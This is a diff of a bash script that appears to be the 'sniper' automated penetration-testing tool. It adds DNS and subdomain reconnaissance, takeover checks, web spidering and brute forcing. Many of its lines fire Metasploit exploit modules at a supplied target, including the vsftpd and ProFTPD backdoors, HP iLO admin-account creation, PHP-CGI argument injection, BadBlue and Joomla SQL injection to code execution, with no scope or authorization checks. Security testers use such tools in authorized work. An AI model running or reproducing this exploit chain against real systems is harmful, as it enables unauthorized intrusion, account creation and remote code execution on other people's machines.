echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
amass -whois -ip -brute -o $LOOT_DIR/domains/domains-$TARGET-amass.txt -min-for-recursive 3 -d $TARGET 2>/dev/null
|
||||
cut -d, -f1 $LOOT_DIR/domains/domains-$TARGET-amass.txt | grep $TARGET > $LOOT_DIR/domains/domains-$TARGET-amass-sorted.txt
|
||||
cut -d, -f2 $LOOT_DIR/domains/domains-$TARGET-amass.txt > $LOOT_DIR/domains/domains-$TARGET-amass-ips-sorted.txt
|
||||
fi
|
||||
if [ "$SUBFINDER" = "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED GATHERING DNS SUBDOMAINS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
subfinder -o $LOOT_DIR/domains/domains-$TARGET-subfinder.txt -b -d $TARGET 2>/dev/null
|
||||
fi
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED BRUTE FORCING DNS SUBDOMAINS (THIS CAN TAKE A WHILE...) $RESET"
|
||||
echo -e "$OKRED BRUTE FORCING DNS SUBDOMAINS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
python $PLUGINS_DIR/dnscan/dnscan.py -d $TARGET -w $DOMAINS_DEFAULT -o $LOOT_DIR/domains/domains-dnscan-$TARGET.txt -i $LOOT_DIR/domains/domains-ips-$TARGET.txt
|
||||
cat $LOOT_DIR/domains/domains-dnscan-$TARGET.txt | grep $TARGET| awk '{print $3}' | sort -u >> $LOOT_DIR/domains/domains-$TARGET.txt 2> /dev/null
|
||||
dos2unix $LOOT_DIR/domains/domains-$TARGET.txt 2>/dev/null
|
||||
if [ "$DNSCAN" = "1" ]; then
|
||||
python /pentest/recon/dnscan/dnscan.py -d $TARGET -w $DOMAINS_FULL -o $LOOT_DIR/domains/domains-dnscan-$TARGET.txt -i $LOOT_DIR/domains/domains-ips-$TARGET.txt
|
||||
cat $LOOT_DIR/domains/domains-dnscan-$TARGET.txt | grep $TARGET| awk '{print $3}' | sort -u >> $LOOT_DIR/domains/domains-$TARGET.txt 2> /dev/null
|
||||
dos2unix $LOOT_DIR/domains/domains-$TARGET.txt 2>/dev/null
|
||||
fi
|
||||
echo ""
|
||||
echo -e "$OKRED ╔═╗╦═╗╔╦╗╔═╗╦ ╦$RESET"
|
||||
echo -e "$OKRED ║ ╠╦╝ ║ ╚═╗╠═╣$RESET"
|
||||
echo -e "$OKRED ╚═╝╩╚═ ╩o╚═╝╩ ╩$RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED GATHERING CERTIFICATE SUBDOMAINS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKBLUE"
|
||||
curl -s https://crt.sh/?q=%25.$TARGET > /tmp/curl.out && cat /tmp/curl.out | grep $TARGET | grep TD | sed -e 's/<//g' | sed -e 's/>//g' | sed -e 's/TD//g' | sed -e 's/\///g' | sed -e 's/ //g' | sed -n '1!p' | sort -u > $LOOT_DIR/domains/domains-$TARGET-crt.txt && cat $LOOT_DIR/domains/domains-$TARGET-crt.txt
|
||||
echo ""
|
||||
echo -e "${OKRED}[+] Domains saved to: $LOOT_DIR/domains/domains-$TARGET-full.txt"
|
||||
if [ "$CRTSH" = "1" ]; then
|
||||
echo -e "$OKRED ╔═╗╦═╗╔╦╗╔═╗╦ ╦$RESET"
|
||||
echo -e "$OKRED ║ ╠╦╝ ║ ╚═╗╠═╣$RESET"
|
||||
echo -e "$OKRED ╚═╝╩╚═ ╩o╚═╝╩ ╩$RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED GATHERING CERTIFICATE SUBDOMAINS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKBLUE"
|
||||
curl -s https://crt.sh/?q=%25.$TARGET > /tmp/curl.out && cat /tmp/curl.out | grep $TARGET | grep TD | sed -e 's/<//g' | sed -e 's/>//g' | sed -e 's/TD//g' | sed -e 's/\///g' | sed -e 's/ //g' | sed -n '1!p' | sort -u > $LOOT_DIR/domains/domains-$TARGET-crt.txt && cat $LOOT_DIR/domains/domains-$TARGET-crt.txt
|
||||
echo ""
|
||||
echo -e "${OKRED}[+] Domains saved to: $LOOT_DIR/domains/domains-$TARGET-full.txt"
|
||||
fi
|
||||
cat $LOOT_DIR/domains/domains-$TARGET-crt.txt > /tmp/curl.out 2> /dev/null
|
||||
cat $LOOT_DIR/domains/domains-$TARGET.txt >> /tmp/curl.out 2> /dev/null
|
||||
cat $LOOT_DIR/domains/domains-$TARGET-amass-sorted.txt >> /tmp/curl.out 2> /dev/null
|
||||
cat $LOOT_DIR/domains/domains-$TARGET-subfinder.txt >> /tmp/curl.out 2> /dev/null
|
||||
cat $LOOT_DIR/domains/targets.txt >> /tmp/curl.out 2> /dev/null
|
||||
sort -u /tmp/curl.out > $LOOT_DIR/domains/domains-$TARGET-full.txt
|
||||
rm -f /tmp/curl.out 2> /dev/null
|
||||
|
|
@ -1028,7 +1235,9 @@ if [ "$MODE" = "stealth" ]; then
|
|||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
dig $TARGET CNAME | egrep -i "wordpress|instapage|heroku|github|bitbucket|squarespace|fastly|feed|fresh|ghost|helpscout|helpjuice|instapage|pingdom|surveygizmo|teamwork|tictail|shopify|desk|teamwork|unbounce|helpjuice|helpscout|pingdom|tictail|campaign|monitor|cargocollective|statuspage|tumblr|amazon|hubspot|cloudfront|modulus|unbounce|uservoice|wpengine|cloudapp" | tee $LOOT_DIR/nmap/takeovers-$TARGET.txt 2>/dev/null
|
||||
for a in `cat $LOOT_DIR/domains/domains-$TARGET-full.txt`; do dig $a CNAME | egrep -i "wordpress|instapage|heroku|github|bitbucket|squarespace|fastly|feed|fresh|ghost|helpscout|helpjuice|instapage|pingdom|surveygizmo|teamwork|tictail|shopify|desk|teamwork|unbounce|helpjuice|helpscout|pingdom|tictail|campaign|monitor|cargocollective|statuspage|tumblr|amazon|hubspot|cloudfront|modulus|unbounce|uservoice|wpengine|cloudapp" | tee $LOOT_DIR/nmap/takeovers-$a.txt 2>/dev/null; done;
|
||||
cd $INSTALL_DIR
|
||||
if [ "$SUBOVER" = "1" ]; then
|
||||
subover -l $LOOT_DIR/domains/domains-$TARGET-full.txt | tee $LOOT_DIR/nmap/takeovers-$TARGET-subover.txt 2>/dev/null
|
||||
fi
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED STARTING PUBLIC S3 BUCKET SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
|
|
@ -1071,7 +1280,13 @@ if [ "$MODE" = "stealth" ]; then
|
|||
echo -e "$OKRED CHECKING HTTP HEADERS AND METHODS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
wget -qO- -T 1 --connect-timeout=3 --read-timeout=3 --tries=1 http://$TARGET | perl -l -0777 -ne 'print $1 if /<title.*?>\s*(.*?)\s*<\/title/si' >> $LOOT_DIR/web/title-http-$TARGET.txt 2> /dev/null
|
||||
curl --connect-timeout 3 -I -s -R http://$TARGET | tee $LOOT_DIR/web/headers-$TARGET-http.txt 2> /dev/null
|
||||
curl --connect-timeout 3 --max-time 3 -I -s -R http://$TARGET | tee $LOOT_DIR/web/headers-$TARGET-http.txt 2> /dev/null
|
||||
if [ "$PASSIVE_SPIDER" = "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING PASSIVE WEB SPIDER $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
curl -sX GET "http://index.commoncrawl.org/CC-MAIN-2018-22-index?url=*.$TARGET&output=json" | jq -r .url | sort -u | tee $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null
|
||||
fi
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING FILE/DIRECTORY BRUTE FORCE $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
|
|
@ -1113,7 +1328,13 @@ if [ "$MODE" = "stealth" ]; then
|
|||
echo -e "$OKRED CHECKING HTTP HEADERS AND METHODS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
wget -qO- -T 1 --connect-timeout=3 --read-timeout=3 --tries=1 https://$TARGET | perl -l -0777 -ne 'print $1 if /<title.*?>\s*(.*?)\s*<\/title/si' >> $LOOT_DIR/web/title-https-$TARGET.txt 2> /dev/null
|
||||
curl --connect-timeout 3 -I -s -R https://$TARGET | tee $LOOT_DIR/web/headers-$TARGET-https.txt 2> /dev/null
|
||||
curl --connect-timeout 3 --max-time 3 -I -s -R https://$TARGET | tee $LOOT_DIR/web/headers-$TARGET-https.txt 2> /dev/null
|
||||
if [ "$PASSIVE_SPIDER" = "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING PASSIVE WEB SPIDER $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
curl -sX GET "http://index.commoncrawl.org/CC-MAIN-2018-22-index?url=*.$TARGET&output=json" | jq -r .url | sort -u | tee $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null
|
||||
fi
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING FILE/DIRECTORY BRUTE FORCE $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
|
|
@ -1121,11 +1342,14 @@ if [ "$MODE" = "stealth" ]; then
|
|||
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* 2> /dev/null
|
||||
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* > $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null
|
||||
wget https://$TARGET/robots.txt -O $LOOT_DIR/web/robots-$TARGET-https.txt 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED GATHERING SSL/TLS INFO $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
sslyze --resum --certinfo=basic --compression --reneg --sslv2 --sslv3 --hide_rejected_ciphers $TARGET
|
||||
sslscan --no-failed $TARGET
|
||||
if [ "$SSL" = "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED GATHERING SSL/TLS INFO $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
sslyze --resum --certinfo=basic --compression --reneg --sslv2 --sslv3 --hide_rejected_ciphers $TARGET | tee $LOOT_DIR/web/sslyze-$TARGET.txt 2> /dev/null
|
||||
sslscan --no-failed $TARGET | tee $LOOT_DIR/web/sslscan-$TARGET.raw 2> /dev/null
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/sslscan-$TARGET.raw > $LOOT_DIR/web/sslscan-$TARGET.txt 2> /dev/null
|
||||
fi
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED SAVING SCREENSHOTS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
|
|
@ -1411,7 +1635,7 @@ echo -e "$OKRED (__ ) / / // // /_/ / __/ / $RESET"
|
|||
echo -e "$OKRED /____/_/ /_/___/ .___/\___/_/ $RESET"
|
||||
echo -e "$OKRED /_/ $RESET"
|
||||
echo -e "$RESET"
|
||||
echo -e "$OKORANGE + -- --=[http://crowdshield.com"
|
||||
echo -e "$OKORANGE + -- --=[http://xerosecurity.com"
|
||||
echo -e "$OKORANGE + -- --=[sniper v$VER by 1N3"
|
||||
echo -e "$RESET"
|
||||
|
||||
|
|
@ -1440,24 +1664,45 @@ if [ "$RECON" = "1" ]; then
|
|||
echo -e "$OKRED GATHERING DNS SUBDOMAINS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
python $PLUGINS_DIR/Sublist3r/sublist3r.py -d $TARGET -vvv -o $LOOT_DIR/domains/domains-$TARGET.txt 2>/dev/null
|
||||
if [ "$AMASS" = "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED GATHERING DNS SUBDOMAINS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
amass -whois -ip -brute -o $LOOT_DIR/domains/domains-$TARGET-amass.txt -min-for-recursive 3 -d $TARGET 2>/dev/null
|
||||
cut -d, -f1 $LOOT_DIR/domains/domains-$TARGET-amass.txt | grep $TARGET > $LOOT_DIR/domains/domains-$TARGET-amass-sorted.txt
|
||||
cut -d, -f2 $LOOT_DIR/domains/domains-$TARGET-amass.txt > $LOOT_DIR/domains/domains-$TARGET-amass-ips-sorted.txt
|
||||
fi
|
||||
|
||||
if [ "$SUBFINDER" = "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED GATHERING DNS SUBDOMAINS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
subfinder -o $LOOT_DIR/domains/domains-$TARGET-subfinder.txt -b -d $TARGET 2>/dev/null
|
||||
fi
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED BRUTE FORCING DNS SUBDOMAINS (THIS CAN TAKE A WHILE...) $RESET"
|
||||
echo -e "$OKRED BRUTE FORCING DNS SUBDOMAINS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
python $PLUGINS_DIR/dnscan/dnscan.py -d $TARGET -w $DOMAINS_DEFAULT -o $LOOT_DIR/domains/domains-dnscan-$TARGET.txt -i $LOOT_DIR/domains/domains-$TARGET-ips.txt
|
||||
cat $LOOT_DIR/domains/domains-dnscan-$TARGET.txt | grep $TARGET | awk '{print $3}' | sort -u >> $LOOT_DIR/domains/domains-$TARGET.txt 2> /dev/null
|
||||
dos2unix $LOOT_DIR/domains/domains-$TARGET.txt 2>/dev/null
|
||||
if [ "$DNSCAN" = "1" ]; then
|
||||
python /pentest/recon/dnscan/dnscan.py -d $TARGET -w $DOMAINS_FULL -o $LOOT_DIR/domains/domains-dnscan-$TARGET.txt -i $LOOT_DIR/domains/domains-$TARGET-ips.txt
|
||||
cat $LOOT_DIR/domains/domains-dnscan-$TARGET.txt | grep $TARGET | awk '{print $3}' | sort -u >> $LOOT_DIR/domains/domains-$TARGET.txt 2> /dev/null
|
||||
dos2unix $LOOT_DIR/domains/domains-$TARGET.txt 2>/dev/null
|
||||
fi
|
||||
echo ""
|
||||
echo -e "$OKRED ╔═╗╦═╗╔╦╗╔═╗╦ ╦$RESET"
|
||||
echo -e "$OKRED ║ ╠╦╝ ║ ╚═╗╠═╣$RESET"
|
||||
echo -e "$OKRED ╚═╝╩╚═ ╩o╚═╝╩ ╩$RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED GATHERING CERTIFICATE SUBDOMAINS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKBLUE"
|
||||
curl -s https://crt.sh/?q=%25.$TARGET > /tmp/curl.out && cat /tmp/curl.out | grep $TARGET | grep TD | sed -e 's/<//g' | sed -e 's/>//g' | sed -e 's/TD//g' | sed -e 's/\///g' | sed -e 's/ //g' | sed -n '1!p' | sort -u > $LOOT_DIR/domains/domains-$TARGET-crt.txt && cat $LOOT_DIR/domains/domains-$TARGET-crt.txt
|
||||
echo ""
|
||||
echo -e "${OKRED}[+] Domains saved to: $LOOT_DIR/domains/domains-$TARGET-full.txt"
|
||||
if [ "$CRTSH" = "1" ]; then
|
||||
echo -e "$OKRED ╔═╗╦═╗╔╦╗╔═╗╦ ╦$RESET"
|
||||
echo -e "$OKRED ║ ╠╦╝ ║ ╚═╗╠═╣$RESET"
|
||||
echo -e "$OKRED ╚═╝╩╚═ ╩o╚═╝╩ ╩$RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED GATHERING CERTIFICATE SUBDOMAINS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKBLUE"
|
||||
curl -s https://crt.sh/?q=%25.$TARGET > /tmp/curl.out && cat /tmp/curl.out | grep $TARGET | grep TD | sed -e 's/<//g' | sed -e 's/>//g' | sed -e 's/TD//g' | sed -e 's/\///g' | sed -e 's/ //g' | sed -n '1!p' | sort -u > $LOOT_DIR/domains/domains-$TARGET-crt.txt && cat $LOOT_DIR/domains/domains-$TARGET-crt.txt
|
||||
echo ""
|
||||
echo -e "${OKRED}[+] Domains saved to: $LOOT_DIR/domains/domains-$TARGET-full.txt"
|
||||
fi
|
||||
cat $LOOT_DIR/domains/domains-$TARGET-crt.txt > /tmp/curl.out 2> /dev/null
|
||||
cat $LOOT_DIR/domains/domains-$TARGET-amass-sorted.txt >> /tmp/curl.out 2> /dev/null
|
||||
cat $LOOT_DIR/domains/domains-$TARGET-subfinder.txt >> /tmp/curl.out 2> /dev/null
|
||||
cat $LOOT_DIR/domains/domains-$TARGET.txt >> /tmp/curl.out 2> /dev/null
|
||||
cat $LOOT_DIR/domains/targets.txt >> /tmp/curl.out 2> /dev/null
|
||||
sort -u /tmp/curl.out > $LOOT_DIR/domains/domains-$TARGET-full.txt
|
||||
|
|
@ -1468,7 +1713,16 @@ if [ "$RECON" = "1" ]; then
|
|||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
dig $TARGET CNAME | egrep -i "wordpress|instapage|heroku|github|bitbucket|squarespace|fastly|feed|fresh|ghost|helpscout|helpjuice|instapage|pingdom|surveygizmo|teamwork|tictail|shopify|desk|teamwork|unbounce|helpjuice|helpscout|pingdom|tictail|campaign|monitor|cargocollective|statuspage|tumblr|amazon|hubspot|cloudfront|modulus|unbounce|uservoice|wpengine|cloudapp" | tee $LOOT_DIR/nmap/takeovers-$TARGET.txt 2>/dev/null
|
||||
for a in `cat $LOOT_DIR/domains/domains-$TARGET-full.txt`; do dig $a CNAME | egrep -i 'wordpress|instapage|heroku|github|bitbucket|squarespace|fastly|feed|fresh|ghost|helpscout|helpjuice|instapage|pingdom|surveygizmo|teamwork|tictail|shopify|desk|teamwork|unbounce|helpjuice|helpscout|pingdom|tictail|campaign|monitor|cargocollective|statuspage|tumblr|amazon|hubspot|cloudfront|modulus|unbounce|uservoice|wpengine|cloudapp' | tee $LOOT_DIR/nmap/takeovers-$a.txt 2>/dev/null; done;
|
||||
cd $INSTALL_DIR
|
||||
if [ "$SUBOVER" = "1" ]; then
|
||||
subover -l $LOOT_DIR/domains/domains-$TARGET-full.txt | tee $LOOT_DIR/nmap/takeovers-$TARGET-subover.txt 2>/dev/null
|
||||
fi
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED CHECKING FOR S3 PUBLIC BUCKETS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
if [ "$CLOUDHUNTER" = "1" ]; then
|
||||
cloudhunter -d $a | tee $LOOT_DIR/nmap/takeovers-$TARGET-aws.txt -v y 2>/dev/null
|
||||
cloudhunter -w $LOOT_DIR/domains/domains-$TARGET-full.txt | tee $LOOT_DIR/nmap/takeovers-$TARGET-aws-all.txt -v y 2>/dev/null
|
||||
fi
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED CHECKING EMAIL SECURITY $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
|
|
@ -1536,6 +1790,7 @@ port_80=`grep 'portid="80"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
|
|||
port_110=`grep 'portid="110"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
|
||||
port_111=`grep 'portid="111"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
|
||||
port_135=`grep 'portid="135"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
|
||||
port_137=`grep 'portid="137"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
|
||||
port_139=`grep 'portid="139"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
|
||||
port_162=`grep 'portid="162"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
|
||||
port_389=`grep 'portid="389"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
|
||||
|
|
@ -1590,7 +1845,7 @@ then
|
|||
else
|
||||
echo -e "$OKORANGE + -- --=[Port 21 opened... running tests...$RESET"
|
||||
nmap -A -sV -Pn -sC -T5 -p 21 --script=ftp-* $TARGET
|
||||
msfconsole -x "use exploit/unix/ftp/vsftpd_234_backdoor; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; run; use unix/ftp/proftpd_133c_backdoor; run; exit;"
|
||||
msfconsole -x "setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; use auxiliary/scanner/ftp/ftp_version; run; use auxiliary/scanner/ftp/anonymous; run; use exploit/unix/ftp/vsftpd_234_backdoor; run; use unix/ftp/proftpd_133c_backdoor; run; exit;"
|
||||
fi
|
||||
|
||||
if [ -z "$port_22" ];
|
||||
|
|
@ -1606,7 +1861,7 @@ else
|
|||
fi
|
||||
cd $INSTALL_DIR
|
||||
nmap -A -sV -Pn -sC -T5 -p 22 --script=ssh-* $TARGET
|
||||
msfconsole -x "use scanner/ssh/ssh_enumusers; setg USER_FILE "$USER_FILE"; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; use scanner/ssh/ssh_identify_pubkeys; run; use scanner/ssh/ssh_version; run; exit;"
|
||||
msfconsole -x "setg USER_FILE "$USER_FILE"; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; use auxiliary/scanner/ssh/ssh_version; run; use scanner/ssh/ssh_enumusers; run; use scanner/ssh/ssh_identify_pubkeys; run; use scanner/ssh/ssh_version; run; exit;"
|
||||
fi
|
||||
|
||||
if [ -z "$port_23" ];
|
||||
|
|
@ -1685,7 +1940,7 @@ else
|
|||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED GATHERING HTTP INFO $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
whatweb -a 3 https://$TARGET | tee $LOOT_DIR/web/whatweb-$TARGET-http 2> /dev/null
|
||||
whatweb -a 3 http://$TARGET | tee $LOOT_DIR/web/whatweb-$TARGET-http 2> /dev/null
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/whatweb-$TARGET-http > $LOOT_DIR/web/whatweb-$TARGET-http.txt 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED GATHERING SERVER INFO $RESET"
|
||||
|
|
@ -1710,10 +1965,16 @@ else
|
|||
fi
|
||||
if [ "$MODE" = "web" ];
|
||||
then
|
||||
if [ "$PASSIVE_SPIDER" = "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING PASSIVE WEB SPIDER $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
curl -sX GET "http://index.commoncrawl.org/CC-MAIN-2018-22-index?url=*.$TARGET&output=json" | jq -r .url | sort -u | tee $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null
|
||||
fi
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING FILE/DIRECTORY BRUTE FORCE $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET -w $WEB_BRUTE_TOPLIST -x 400,403,404,405,406,429,502,503,504 -F -e php,asp,aspx,bak,zip,tar.gz,html,htm
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET -w $WEB_BRUTE_INSANE -x 400,403,404,405,406,429,502,503,504 -F -e php,asp,aspx,bak,zip,tar.gz,html,htm
|
||||
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* 2> /dev/null
|
||||
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* > $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null
|
||||
wget http://$TARGET/robots.txt -O $LOOT_DIR/web/robots-$TARGET-http.txt 2> /dev/null
|
||||
|
|
@ -1725,6 +1986,10 @@ else
|
|||
echo -e "$OKRED ENUMERATING WEB SOFTWARE $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
clusterd -i $TARGET
|
||||
|
||||
|
||||
|
||||
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING WORDPRESS VULNERABILITY SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
|
|
@ -1739,11 +2004,81 @@ else
|
|||
echo ""
|
||||
python $CMSMAP -t http://$TARGET/wordpress/
|
||||
echo ""
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING WEB VULNERABILITY SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
nikto -h http://$TARGET -output $LOOT_DIR/web/nikto-$TARGET-http.txt
|
||||
if [ "$NIKTO" = "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING WEB VULNERABILITY SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
nikto -h http://$TARGET -output $LOOT_DIR/web/nikto-$TARGET-http.txt
|
||||
fi
|
||||
|
||||
|
||||
|
||||
cd $INSTALL_DIR
|
||||
|
||||
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING WEBDAV SCANNER $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -x "use scanner/http/webdav_scanner; setg RHOSTS "$TARGET"; setg RPORT "80"; setg SSL false; run; use scanner/http/webdav_website_content; run; exit;"
|
||||
|
||||
|
||||
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING APACHE TOMCAT UTF8 TRAVERSAL EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -x "use admin/http/tomcat_utf8_traversal; setg RHOSTS "$TARGET"; setg RPORT "80"; set SSL false; run; exit;"
|
||||
|
||||
|
||||
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING APACHE OPTIONS BLEED EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -x "use scanner/http/apache_optionsbleed; setg RHOSTS "$TARGET"; setg RPORT "80"; set SSL false; run; exit;"
|
||||
|
||||
|
||||
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING HP ILO AUTH BYPASS EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -x "use admin/hp/hp_ilo_create_admin_account; setg RHOST "$TARGET"; setg RPORT "80"; set SSL false; run; exit;"
|
||||
|
||||
|
||||
|
||||
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING MS15-034 SYS MEMORY DUMP METASPLOIT EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -x "use auxiliary/scanner/http/ms15_034_http_sys_memory_dump; setg RHOSTS \"$TARGET\"; set RPORT 80; set WAIT 2; run; exit;"
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING BADBLUE PASSTHRU METASPLOIT EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -x "use exploit/windows/http/badblue_passthru; setg RHOST \"$TARGET\"; set RPORT 80; run; back;exit;"
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING PHP CGI ARG INJECTION METASPLOIT EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -x "use exploit/multi/http/php_cgi_arg_injection; setg RHOST \"$TARGET\"; set RPORT 80; run; back;exit;"
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING JOOMLA COMFIELDS SQL INJECTION METASPLOIT EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -x "use unix/webapp/joomla_comfields_sqli_rce; setg RHOST \"$TARGET\"; set RPORT 80; set SSL false; run; back;exit;"
|
||||
|
||||
|
||||
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING PHPMYADMIN METASPLOIT EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
|
|
@ -1817,6 +2152,7 @@ then
|
|||
echo -e "$OKRED + -- --=[Port 111 closed... skipping.$RESET"
|
||||
else
|
||||
